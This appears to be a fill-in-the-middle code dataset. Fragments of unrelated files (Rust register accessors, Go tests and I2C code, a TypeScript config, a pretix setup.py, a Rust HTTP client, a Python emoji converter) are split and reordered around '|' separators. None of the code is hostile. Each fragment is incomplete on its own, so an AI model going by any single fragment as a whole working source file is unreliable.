#[inline(always)]
pub fn input_inverted_high(self) -> &'a mut W {
self.variant(INV_A::INPUT_INVERTED_HIGH)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 6)) | (((value as u32) & 0x01) << 6);
self.w
}
}
#[doc = "Glitch filter control\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum FILTER_A {
#[doc = "0: Noise pulses below approximately 10 ns are filtered\r\n out."]
ENABLED = 0,
#[doc = "1: No input filtering is done."]
DISABLED = 1,
}
impl From<FILTER_A> for bool {
#[inline(always)]
fn from(variant: FILTER_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `FILTER`"]
pub type FILTER_R = crate::R<bool, FILTER_A>;
impl FILTER_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> FILTER_A {
match self.bits {
false => FILTER_A::ENABLED,
true => FILTER_A::DISABLED,
}
}
#[doc = "Checks if the value of the field is `ENABLED`"]
#[inline(always)]
pub fn is_enabled(&self) -> bool {
*self == FILTER_A::ENABLED
}
#[doc = "Checks if the value of the field is `DISABLED`"]
#[inline(always)]
pub fn is_disabled(&self) -> bool {
*self == FILTER_A::DISABLED
}
}
#[doc = "Write proxy for field `FILTER`"]
pub struct FILTER_W<'a> {
w: &'a mut W,
}
impl<'a> FILTER_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FILTER_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Noise pulses below approximately 10 ns are filtered out."]
#[inline(always)]
pub fn enabled(self) -> &'a mut W {
self.variant(FILTER_A::ENABLED)
}
#[doc = "No input filtering is done."]
#[inline(always)]
pub fn disabled(self) -> &'a mut W {
self.variant(FILTER_A::DISABLED)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 8)) | (((value as u32) & 0x01) << 8);
self.w
}
}
#[doc = "Driver slew rate\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum SLEW_A {
#[doc = "0: Standard mode, output slew rate control is enabled. More\r\n outputs can be switched simultaneously."]
STANDARD = 0,
#[doc = "1: Fast mode, slew rate control is disabled. Refer to the\r\n appropriate specific device data sheet for details."]
FAST = 1,
}
impl From<SLEW_A> for bool {
#[inline(always)]
fn from(variant: SLEW_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `SLEW`"]
pub type SLEW_R = crate::R<bool, SLEW_A>;
impl SLEW_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> SLEW_A {
match self.bits {
false => SLEW_A::STANDARD,
true => SLEW_A::FAST,
}
}
#[doc = "Checks if the value of the field is `STANDARD`"]
#[inline(always)]
pub fn is_standard(&self) -> bool {
*self == SLEW_A::STANDARD
}
#[doc = "Checks if the value of the field is `FAST`"]
#[inline(always)]
pub fn is_fast(&self) -> bool
|
}
#[doc = "Write proxy for field `SLEW`"]
pub struct SLEW_W<'a> {
w: &'a mut W,
}
impl<'a> SLEW_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: SLEW_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Standard mode, output slew rate control is enabled. More outputs can be switched simultaneously."]
#[inline(always)]
pub fn standard(self) -> &'a mut W {
self.variant(SLEW_A::STANDARD)
}
#[doc = "Fast mode, slew rate control is disabled. Refer to the appropriate specific device data sheet for details."]
#[inline(always)]
pub fn fast(self) -> &'a mut W {
self.variant(SLEW_A::FAST)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 9)) | (((value as u32) & 0x01) << 9);
self.w
}
}
#[doc = "Open-drain mode.\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum OD_A {
#[doc = "0: Disable."]
DISABLE_ = 0,
#[doc = "1: Open-drain mode enabled. This is not a true open-drain\r\n mode. Input cannot be pulled up above VDD."]
OPEN_DRAIN_MODE_ENAB = 1,
}
impl From<OD_A> for bool {
#[inline(always)]
fn from(variant: OD_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `OD`"]
pub type OD_R = crate::R<bool, OD_A>;
impl OD_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> OD_A {
match self.bits {
false => OD_A::DISABLE_,
true => OD_A::OPEN_DRAIN_MODE_ENAB,
}
}
#[doc = "Checks if the value of the field is `DISABLE_`"]
#[inline(always)]
pub fn is_disable_(&self) -> bool {
*self == OD_A::DISABLE_
}
#[doc = "Checks if the value of the field is `OPEN_DRAIN_MODE_ENAB`"]
#[inline(always)]
pub fn is_open_drain_mode_enab(&self) -> bool {
*self == OD_A::OPEN_DRAIN_MODE_ENAB
}
}
#[doc = "Write proxy for field `OD`"]
pub struct OD_W<'a> {
w: &'a mut W,
}
impl<'a> OD_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: OD_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Disable."]
#[inline(always)]
pub fn disable_(self) -> &'a mut W {
self.variant(OD_A::DISABLE_)
}
#[doc = "Open-drain mode enabled. This is not a true open-drain mode. Input cannot be pulled up above VDD."]
#[inline(always)]
pub fn open_drain_mode_enab(self) -> &'a mut W {
self.variant(OD_A::OPEN_DRAIN_MODE_ENAB)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 10)) | (((value as u32) & 0x01) << 10);
self.w
}
}
impl R {
#[doc = "Bits 0:2 - Selects pin function for pin P0\\[8\\]"]
#[inline(always)]
pub fn func(&self) -> FUNC_R {
FUNC_R::new((self.bits & 0x07) as u8)
}
#[doc = "Bits 3:4 - Selects function mode (on-chip pull-up/pull-down resistor control)."]
#[inline(always)]
pub fn mode(&self) -> MODE_R {
MODE_R::new(((self.bits >> 3) & 0x03) as u8)
}
#[doc = "Bit 5 - Hysteresis."]
#[inline(always)]
pub fn hys(&self) -> HYS_R {
HYS_R::new(((self.bits >> 5) & 0x01) != 0)
}
#[doc = "Bit 6 - Invert input"]
#[inline(always)]
pub fn inv(&self) -> INV_R {
INV_R::new(((self.bits >> 6) & 0x01) != 0)
}
#[doc = "Bit 8 - Glitch filter control"]
#[inline(always)]
pub fn filter(&self) -> FILTER_R {
FILTER_R::new(((self.bits >> 8) & 0x01) != 0)
}
#[doc = "Bit 9 - Driver slew rate"]
#[inline(always)]
pub fn slew(&self) -> SLEW_R {
SLEW_R::new(((self.bits >> 9) & 0x01) != 0)
}
#[doc = "Bit 10 - Open-drain mode."]
#[inline(always)]
pub fn od(&self) -> OD_R {
OD_R::new(((self.bits >> 10) & 0x01) != 0)
}
}
impl W {
#[doc = "Bits 0:2 - Selects pin function for pin P0\\[8\\]"]
#[inline(always)]
pub fn func(&mut self) -> FUNC_W {
FUNC_W { w: self }
}
#[doc = "Bits 3:4 - Selects function mode (on-chip pull-up/pull-down resistor control)."]
#[inline(always)]
pub fn mode(&mut self) -> MODE_W {
MODE_W { w: self }
}
#[doc = "Bit 5 - Hysteresis."]
#[inline(always)]
pub fn hys(&mut self) -> HYS_W {
HYS_W { w: self }
}
#[doc = "Bit 6 - Invert input"]
#[inline(always)]
pub fn inv(&mut self) -> INV_W {
INV_W { w: self }
}
#[doc = "Bit 8 - Glitch filter control"]
#[inline(always)]
pub fn filter(&mut self) -> FILTER_W {
FILTER_W { w: self }
}
#[doc = "Bit 9 - Driver slew rate"]
#[inline(always)]
pub fn slew(&mut self) -> SLEW_W {
SLEW_W { w: self }
}
#[doc = "Bit 10 - Open-drain mode."]
#[inline(always)]
pub fn od(&mut self) -> OD_W {
OD_W { w: self }
}
}
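// Usage sketch (assumption: standard svd2rust access pattern; the `pinconn`
// peripheral handle is illustrative):
//
//     pinconn.p0_8.write(|w| w.func().i2s_tx_ws().mode().pull_up_resistor_ena());
//     let fast = pinconn.p0_8.read().slew().is_fast();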
|
{
*self == SLEW_A::FAST
}
|
vlantransparent_test.go
|
//go:build acceptance || networking || vlantransparent
// +build acceptance networking vlantransparent
package v2
import (
"testing"
"github.com/nexclipper/gophercloud/acceptance/clients"
networkingv2 "github.com/nexclipper/gophercloud/acceptance/openstack/networking/v2"
"github.com/nexclipper/gophercloud/acceptance/tools"
"github.com/nexclipper/gophercloud/openstack/common/extensions"
th "github.com/nexclipper/gophercloud/testhelper"
)
func TestVLANTransparentCRUD(t *testing.T)
|
{
client, err := clients.NewNetworkV2Client()
th.AssertNoErr(t, err)
extension, err := extensions.Get(client, "vlan-transparent").Extract()
if err != nil {
t.Skip("This test requires vlan-transparent Neutron extension")
}
tools.PrintResource(t, extension)
// Create a VLAN transparent network.
network, err := CreateVLANTransparentNetwork(t, client)
th.AssertNoErr(t, err)
defer networkingv2.DeleteNetwork(t, client, network.ID)
tools.PrintResource(t, network)
// Update the created VLAN transparent network.
newNetwork, err := UpdateVLANTransparentNetwork(t, client, network.ID)
th.AssertNoErr(t, err)
tools.PrintResource(t, newNetwork)
// Check that the created VLAN transparent network exists.
vlanTransparentNetworks, err := ListVLANTransparentNetworks(t, client)
th.AssertNoErr(t, err)
var found bool
for _, vlanTransparentNetwork := range vlanTransparentNetworks {
if vlanTransparentNetwork.ID == network.ID {
found = true
}
}
th.AssertEquals(t, found, true)
}
|
|
firmata_i2c.go
|
package firmata
import (
// "gobot.io/x/gobot/drivers/i2c"
"gobot.io/x/gobot/platforms/firmata/client"
)
type firmataI2cConnection struct {
address int
adaptor *Adaptor
}
// NewFirmataI2cConnection creates an I2C connection to an I2C device at
// the specified address
func NewFirmataI2cConnection(adaptor *Adaptor, address int) (connection *firmataI2cConnection)
|
// Read tries to read a full buffer from the i2c device.
// Returns an empty array if the response from the board has timed out.
func (c *firmataI2cConnection) Read(b []byte) (read int, err error) {
ret := make(chan []byte)
if err = c.adaptor.Board.I2cRead(c.address, len(b)); err != nil {
return
}
c.adaptor.Board.Once(c.adaptor.Board.Event("I2cReply"), func(data interface{}) {
ret <- data.(client.I2cReply).Data
})
result := <-ret
copy(b, result)
read = len(result)
return
}
func (c *firmataI2cConnection) Write(data []byte) (written int, err error) {
var chunk []byte
for len(data) >= 16 {
chunk, data = data[:16], data[16:]
err = c.adaptor.Board.I2cWrite(c.address, chunk)
if err != nil {
return
}
written += len(chunk)
}
if len(data) > 0 {
err = c.adaptor.Board.I2cWrite(c.address, data[:])
written += len(data)
}
return
}
func (c *firmataI2cConnection) Close() error {
return nil
}
func (c *firmataI2cConnection) ReadByte() (val byte, err error) {
buf := []byte{0}
if _, err = c.Read(buf); err != nil {
return
}
val = buf[0]
return
}
func (c *firmataI2cConnection) ReadByteData(reg uint8) (val uint8, err error) {
if err = c.WriteByte(reg); err != nil {
return
}
return c.ReadByte()
}
func (c *firmataI2cConnection) ReadWordData(reg uint8) (val uint16, err error) {
if err = c.WriteByte(reg); err != nil {
return
}
buf := []byte{0, 0}
if _, err = c.Read(buf); err != nil {
return
}
low, high := buf[0], buf[1]
val = (uint16(high) << 8) | uint16(low)
return
}
func (c *firmataI2cConnection) WriteByte(val byte) (err error) {
buf := []byte{val}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteByteData(reg uint8, val byte) (err error) {
buf := []byte{reg, val}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteWordData(reg uint8, val uint16) (err error) {
low := uint8(val & 0xff)
high := uint8((val >> 8) & 0xff)
buf := []byte{reg, low, high}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteBlockData(reg uint8, data []byte) (err error) {
if len(data) > 32 {
data = data[:32]
}
buf := make([]byte, len(data)+1)
	copy(buf[1:], data)
buf[0] = reg
_, err = c.Write(buf)
return
}
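// Usage sketch (assumption: device address 0x40 and register 0x00 are
// examples only):
//
//	conn := NewFirmataI2cConnection(adaptor, 0x40)
//	if err := conn.WriteByteData(0x00, 0x01); err != nil {
//		// handle error
//	}
//	val, _ := conn.ReadByteData(0x00)
//	_ = val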
|
{
return &firmataI2cConnection{adaptor: adaptor, address: address}
}
|
cmd.go
|
// Copyright Contributors to the Open Cluster Management project
package clusterpool
import (
"fmt"
clusteradmhelpers "open-cluster-management.io/clusteradm/pkg/helpers"
"github.com/open-cluster-management/cm-cli/pkg/clusterpoolhost"
genericclioptionscm "github.com/open-cluster-management/cm-cli/pkg/genericclioptions"
"github.com/open-cluster-management/cm-cli/pkg/helpers"
cmdutil "k8s.io/kubectl/pkg/cmd/util"
"github.com/spf13/cobra"
"k8s.io/cli-runtime/pkg/genericclioptions"
)
var example = `
# Scale clusterpool
%[1]s scale cp <clusterpool_name> --size <size> <options>
# Scale clusterpool on a given clusterpoolhost
%[1]s scale cp <clusterpool_name> --size <size> --cph <clusterpoolhost> <options>
`
// NewCmd ...
func
|
(cmFlags *genericclioptionscm.CMFlags, streams genericclioptions.IOStreams) *cobra.Command {
o := newOptions(cmFlags, streams)
cmd := &cobra.Command{
Use: "clusterpool",
Aliases: []string{"cp"},
Short: "Scale clusterpool",
Example: fmt.Sprintf(example, helpers.GetExampleHeader()),
SilenceUsage: true,
PreRunE: func(cmd *cobra.Command, args []string) error {
clusteradmhelpers.DryRunMessage(cmFlags.DryRun)
return clusterpoolhost.BackupCurrentContexts()
},
Run: func(cmd *cobra.Command, args []string) {
cmdutil.CheckErr(o.complete(cmd, args))
cmdutil.CheckErr(o.validate())
cmdutil.CheckErr(o.run())
},
PostRunE: func(cmd *cobra.Command, args []string) error {
return clusterpoolhost.RestoreCurrentContexts()
},
}
cmd.Flags().StringVar(&o.ClusterPoolHost, "cph", "", "The clusterpoolhost to use")
cmd.Flags().Int32Var(&o.Size, "size", 1, "Set the size of a clusterpool")
return cmd
}
|
NewCmd
|
settingsRoute.config.tsx
|
import { appConfig } from "../../config/app.config"
import { RouteConfig } from "../_utils/RouteConfig"
import { Settings } from "./Settings"
export const settingsRouteConfig: RouteConfig = {
|
path: `${appConfig.historyBasename}/settings`,
},
}
|
path: `${appConfig.historyBasename}/settings`,
element: () => <Settings />,
matchConfig: {
|
configuration.ts
|
import * as path from 'path';
import * as dotenv from 'dotenv';
const envFile = '.env';
dotenv.config({
path: path.resolve(process.cwd(), envFile),
});
interface Conf {
[key: string]: any;
|
}
export default (): Conf => {
return {
dora_url: process.env.DORA_URL,
relay_port: parseInt(process.env.RELAY_PORT, 10),
process_port: parseInt(process.env.PROCESS_PORT, 10),
manager_port: parseInt(process.env.MANAGER_PORT, 10),
jwt_secret: process.env.JWT_SECRET,
redis: {
host: process.env.REDIS_HOST,
      port: parseInt(process.env.REDIS_PORT, 10),
password: process.env.REDIS_PASSWORD,
},
kafka: {
brokers: process.env.KAFKA_BROKERS.split(','),
},
elasticsearch: {
node: process.env.ELASTICSEARCH_NODE,
username: process.env.ELASTIC_USERNAME,
password: process.env.ELASTIC_PASSWORD,
},
email: {
host: process.env.EMAIL_SERVER_HOST,
port: parseInt(process.env.EMAIL_SERVER_PORT, 10),
user: process.env.EMAIL_SERVER_USER,
pass: process.env.EMAIL_SERVER_PASSWORD,
},
};
};
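// Usage sketch (assumption: consumer code, not part of this file):
//
//   import configuration from './configuration';
//   const conf = configuration();
//   console.log(conf.relay_port, conf.redis.host);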
| |
setup.py
|
import os
from distutils.command.build import build
from django.core import management
from setuptools import find_packages, setup
from pretix_eventparts import __version__
try:
with open(
os.path.join(os.path.dirname(__file__), "README.rst"), encoding="utf-8"
) as f:
long_description = f.read()
except Exception:
long_description = ""
class CustomBuild(build):
def
|
(self):
management.call_command("compilemessages", verbosity=1)
build.run(self)
cmdclass = {"build": CustomBuild}
setup(
name="pretix-eventparts",
version=__version__,
description="Short description",
long_description=long_description,
url="https://github.com/bockstaller/pretix-eventparts",
author="Lukas Bockstaller",
author_email="[email protected]",
license="Apache",
install_requires=[],
packages=find_packages(exclude=["tests", "tests.*"]),
include_package_data=True,
cmdclass=cmdclass,
entry_points="""
[pretix.plugin]
pretix_eventparts=pretix_eventparts:PretixPluginMeta
""",
)
|
run
|
client.rs
|
use std::io::ErrorKind;
use bytes::BytesMut;
use url::Url;
use crate::body::Body;
use crate::error::{Error, InvalidUrl, IoError, Result};
use crate::header::HeaderMap;
use crate::method::Method;
use crate::proto::{Connector, HttpConfig, HttpConnector, HttpParser, ParserResult, RequestParser, ResponseParser};
use crate::request::Request;
use crate::response::Response;
use crate::version::Version;
/// the struct of http client
#[derive(Debug)]
pub struct HttpClient<C: Connector> {
connector: C,
}
impl<C: Connector> HttpClient<C> {
///
///
/// ```
/// use request_rs::produce::*;
    /// use url::Url;
    ///
    /// let req = Request::builder()
    ///     .method(Method::GET)
    ///     .uri(Url::parse("http://www.example.com").expect("invalid url"))
    ///     .header("User-Agent", "request-rs")
    ///     .header("Host", "www.example.com")
    ///     .version(Version::HTTP_11)
    ///     .body(Body::empty()).unwrap();
    /// let mut client = HttpClient::from_connector(HttpConnector::new());
    /// let response = client.send(req).expect("request failed");
    /// assert_eq!(response.status(), StatusCode::from_u16(200).unwrap());
/// ```
pub fn from_connector(connector: C) -> Self {
Self {
connector,
}
}
}
impl HttpClient<HttpConnector> {
/// do http request
/// ```
/// use request_rs::produce::*;
    /// use url::Url;
    ///
    /// fn main(){
    ///     let req = Request::builder()
    ///         .method(Method::GET)
    ///         .uri(Url::parse("http://www.example.com").expect("invalid url"))
    ///         .header("User-Agent", "request-rs")
    ///         .header("Host", "www.example.com")
    ///         .version(Version::HTTP_11)
    ///         .body(Body::empty()).unwrap();
    ///     let mut client = HttpClient::http();
    ///     let response = client.send(req).expect("request failed");
    ///     assert_eq!(response.status(), StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn send(&mut self, req: Request<Body>) -> Result<Response<Body>> {
let url = req.uri().ok_or(Error::from(InvalidUrl::new("missing url")))?.clone();
let sock_addr = RequestParser::socket_addr(&url)?;
let req_buf = RequestParser::encode(req)?;
self.connector.connect_to(&sock_addr)?;
// send request
self.connector.write_all(req_buf.as_ref())?;
// response
let mut data = Vec::new();
self.connector.read_all(&mut data)?;
let mut buf = BytesMut::from(data.as_slice());
let mut parser = ResponseParser::new();
let resp = match parser.parse(&mut buf)? {
ParserResult::Complete(resp) => resp,
ParserResult::Partial => {
return Err(Error::from(IoError::from_kind(ErrorKind::UnexpectedEof)));
}
};
Ok(resp)
}
/// send request
/// use http connector
/// ```
/// use request_rs::produce::*;
///
/// fn main(){
/// let mut client = HttpClient::http();
    ///     let resp = client.send_request("http://www.example.com", Method::GET, None, None).unwrap();
    ///     assert_eq!(resp.status(), StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn send_request(&mut self, url: &str, method: Method, headers: Option<HeaderMap>, body: Option<Body>) -> Result<Response<Body>> {
let url = Url::parse(url)?;
let host = url.domain().ok_or(Error::from(InvalidUrl::new("invalid url")))?;
let mut req = Request::builder()
.method(method)
.version(Version::HTTP_11);
if let Some(header) = headers {
req = req.replace_header_map(header);
} else {
req = req.header("User-Agent", "request-rs");
}
let body = match body {
Some(body) => body,
None => Body::empty()
};
let req = req.header("Host", host)
.uri(url)
.header("Content-Length", body.body_length())
.body(body)?;
self.send(req)
}
/// with http config
/// ```
/// use request_rs::config::h1::HttpConfig;
/// fn main(){
/// use std::time::Duration;
/// use request_rs::produce::{HttpClient, Method, StatusCode};
/// let config = HttpConfig {
/// connect_timeout: None,
/// happy_eyeballs_timeout: Some(Duration::from_millis(300)),
/// keep_alive_timeout: None,
/// local_address: None,
/// nodelay: false,
/// reuse_address: false,
/// send_buffer_size: None,
/// recv_buffer_size: None,
/// ttl: 64,
/// };
/// let mut client = HttpClient::with_config(config);
    ///     let response = client.send_request("http://www.example.com", Method::GET, None, None).unwrap();
    ///     assert_eq!(response.status(), StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn with_config(config: HttpConfig) -> Self {
Self::from_connector(HttpConnector::with_http_config(config))
}
/// use http connector
|
///
/// fn main(){
/// let mut client = HttpClient::http();
    ///     let resp = client.send_request("http://www.example.com", Method::GET, None, None).unwrap();
    ///     assert_eq!(resp.status(), StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn http() -> Self {
Self::from_connector(HttpConnector::new())
}
/// do http get request
///
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_get(){
/// let resp = HttpClient::request(Method::GET,"http://www.example.com/", None, None).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_header(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::request(Method::GET,"http://www.example.com/", None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn request(method: Method, url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
let mut client = Self::http();
client.send_request(url, method, headers, body)
}
/// do http get request
///
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_get(){
/// let resp = HttpClient::get("http://www.example.com/", None, None).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_header(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::get("http://www.example.com/", None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_param(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::get("http://www.example.com/?admin=yes&show=yes",None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn get(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::GET, url, body, headers)
}
/// do http post request
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_post_with_data(){
    /// let body = Body::from_str("username=admin&password=password123");
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::post("http://www.example.com/",Some(body), Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn post(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::POST, url, body, headers)
}
/// do http put request
pub fn put(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::PUT, url, body, headers)
}
/// do http delete request
pub fn delete(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::DELETE, url, body, headers)
}
/// do http head request
pub fn head(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::HEAD, url, body, headers)
}
/// do http patch request
pub fn patch(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::PATCH, url, body, headers)
}
/// do http connect request
pub fn connect(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::CONNECT, url, body, headers)
}
/// do http options request
pub fn options(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::OPTIONS, url, body, headers)
}
/// do http trace request
pub fn trace(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::TRACE, url, body, headers)
}
}
|
/// ```
/// use request_rs::produce::*;
|
emoji.py
|
import json
import re
import unicodedata
import string
import hashlib
def smileys_to_ascii(s):
res = []
for i, c in enumerate(s):
if c in SMILEYS:
res.append(SMILEYS[c])
if i < len(s) - 1 and s[i + 1] in SMILEYS: # separate smileys
res.append(' ')
elif ord(c) > 128 and unicodedata.category(c)[0] == 'S':
try:
name = ':'+unicodedata.name(c).lower().replace(' ','-')+':'
res.append(name)
            except ValueError:  # no Unicode name for this codepoint
res.append(c)
else:
res.append(c)
return ''.join(res)
def ascii_to_smileys(s):
res = []
words = s.split(' ')
for word in words:
if word in ASCIIS:
res.append(ASCIIS[word])
elif word[0]==':' and word[-1]==':':
try:
emoji = unicodedata.lookup(word[1:-1].upper().replace('-',' '))
res.append(emoji)
            except KeyError:  # no emoji with this Unicode name
res.append(word)
else:
res.append(word)
return ''.join(res)
def emoji_to_shortcode(message):
res = []
for i, c in enumerate(message):
if ord(c) > 128 and unicodedata.category(c)[0] == 'S':
name = ':'+unicodedata.name(c).lower().replace(' ','-')+':'
res.append(name)
else:
res.append(c)
return ''.join(res)
def
|
(message):
parts = message.split(":")
out = ""
c = False
for part in parts:
if part in name_to_emoji:
out += name_to_emoji[part]
c = False
else:
if c:
out += ':'
else:
c = True
out += part
return out
with open('emoji/gemoji.js', 'rb') as fp:
data = fp.read()
data = data.decode('utf-8')
gemoji = json.loads(data)
name_to_emoji = {}
for emoji, data in gemoji.items():
for name in data['names']:
name_to_emoji[name] = emoji
SMILEYS = {chr(k): v for k, v in {
0x263a: ':)',
0x1f494: '</3',
0x1f49c: '<3',
0x2764: '<3',
0x1f60a: '=D',
0x1f600: ':D',
0x1f601: '^_^',
0x1f602: ':\'D',
0x1f603: ':D',
0x1f604: ':D',
0x1f605: ':D',
0x1f606: ':D',
0x1f607: '0:)',
0x1f608: '}:)',
0x1f609: ';)',
0x1f60e: '8)',
0x1f610: ':|',
0x1f611: '-_-',
0x1f614: 'u_u',
0x1f615: ':/',
0x1f616: ':s',
0x1f617: ':*',
0x1f618: ';*',
0x1f61B: ':P',
0x1f61C: ';P',
0x1f61E: ':(',
0x1f621: '>:(',
0x1f622: ';_;',
0x1f623: '>_<',
0x1f62E: ':o',
0x1f632: ':O',
0x1f635: 'x_x',
0x1f638: ':3',
0x1f620: '>:(',
0x1f62c: '>:(',
0x1f62a: '(-_-)zzz',
0x1f634: '(-_-).zZ',
0x1f4a4: '.zZ',
0x1f624: '>:(',
0x1f625: 'D:',
0x1f627: 'D:',
0x1f619: ':*',
0x1f61a: ':*',
0x1f612: ':|',
0x1f636: ':|',
0x1f613: ':O',
0x1f630: ':O',
0x1f628: 'o_o',
0x1f631: 'O_O',
    0x1f62d: ":'(",
0x1f61d: ';P',
0x1f64d: '>:|',
0x1f626: '>:O',
0x1f61f: ':/',
0x2639: ':(',
0x1f60b: ';P',
0x1f60d: '<3<3<3',
0x1f642: ':)',
0x1f917: ':hug:',
0x1f914: ':/ hmm',
0x1f644: '(e_e)',
0x1f62f: ':-o',
0x1f62b: "'>_<",
0x1f913: 'B-)',
0x1f641: ':(',
0x1f629: '>_<',
}.items()}
ASCIIS = {v: chr(k) for k, v in {
0x1f62a: '(-_-)zzz',
0x1f634: '(-_-).zZ',
0x1f4a4: '.zZ',
0x1f631: 'O_O',
0x1f62d: ":''(",
0x1f64d: '>:|',
0x1f626: '>:O',
0x2764: ':heart:',
0x263a: ':)',
0x1f494: '</3',
0x1f49c: '<3',
0x1f60a: '=D',
0x1f600: ':D',
0x1f601: '^_^',
0x1f602: ':\'D',
0x1f607: '0:)',
0x1f608: '}:)',
0x1f609: ';)',
0x1f60e: '8)',
0x1f610: ':|',
0x1f611: '-_-',
0x1f613: 'o_o',
0x1f614: 'u_u',
0x1f615: ':/',
0x1f616: ':s',
0x1f617: ':*',
0x1f618: ';*',
0x1f61B: ':P',
0x1f61C: ';P',
0x1f61e: ':(',
0x1f621: '>:(',
0x1f622: ';_;',
0x1f622: ';(',
0x1f622: ":'(",
0x1f623: '>_<',
0x1f626: 'D:',
0x1f62E: ':o',
0x1f632: ':O',
0x1f635: 'x_x',
0x1f638: ':3',
0x1f917: ':hug:',
0x1f644: '(e_e)',
}.items()}
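# Usage sketch (assumption: emoji/gemoji.js is present so the module imports):
# smileys_to_ascii('\U0001F600')   # -> ':D'
# ascii_to_smileys(':D')           # -> '\U0001F600'
# emoji_to_shortcode('\u263A')     # -> ':white-smiling-face:'
# shortcode_to_emoji(':smile:')    # -> the gemoji mapped to "smile"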
|
shortcode_to_emoji
|
index.js
|
const { setupThenCommand: ingestV2Command } = require('./ingestV2');
const { setupThenCommand: deleteActivityCommand } = require('./deleteActivity');
const { setupThenCommand: migrateStatsCommand } = require('./migrateStats');
const { setupThenCommand: recalculateStatsCommand } = require('./recalculateStats');
const { withPrompt } = require('../utils');
module.exports = {
command: [
'athlete <subcommand> [<subargs...>]',
],
